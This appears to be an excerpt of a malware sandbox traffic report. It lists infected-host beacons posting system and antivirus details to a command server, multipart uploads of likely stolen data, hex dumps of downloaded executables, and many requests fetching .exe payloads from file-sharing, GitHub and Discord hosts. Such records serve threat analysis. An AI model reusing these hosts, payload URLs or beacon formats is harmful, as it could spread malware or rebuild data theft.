Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4877482924580855Host: 116.202.5.101Content-Length: 112010Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic	HTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0787962131917872Host: 116.202.5.101Content-Length: 118534Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:09 GMTContent-Type: application/octet-streamContent-Length: 382464Last-Modified: Sat, 19 Nov 2022 09:35:01 GMTConnection: keep-aliveETag: "6378a345-5d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d3 af ec 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 22 01 00 00 b2 44 00 00 00 00 00 a5 48 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 b4 18 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 27 01 00 28 00 00 00 00 70 43 00 78 43 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a0 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 20 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 29 42 00 00 40 01 00 00 28 02 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 43 02 00 00 70 43 00 00 44 02 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 8e 42 00 00 00 c0 45 00 00 44 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 19 Nov 2022 08:37:50 GMTETag: "58000-5edcebcd5f2db"Accept-Ranges: bytesContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 f4 f8 7d 92 95 96 2e 92 95 96 2e 92 95 96 2e 8c c7 03 2e 86 95 96 2e 8c c7 15 2e cb 95 96 2e 8c c7 12 2e b5 95 96 2e 51 9a cb 2e 91 95 96 2e 92 95 97 2e cc 95 96 2e 9b ed 12 2e 93 95 96 2e 8c c7 02 2e 93 95 96 2e 9b ed 07 2e 93 95 96 2e 52 69 63 68 92 95 96 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 92 78 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 42 01 00 00 48 04 00 00 00 00 00 50 af 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 28 da 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a0 01 00 28 00 00 00 00 b0 05 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 41 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2e 48 00 00 00 60 01 00 00 4a 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f4 03 00 00 b0 01 00 00 e8 03 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 06 00 00 00 b0 05 00 00 08 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic	HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic	HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic	HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic	HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic	HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
Source: global traffic	HTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic	HTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
Source: global traffic	HTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
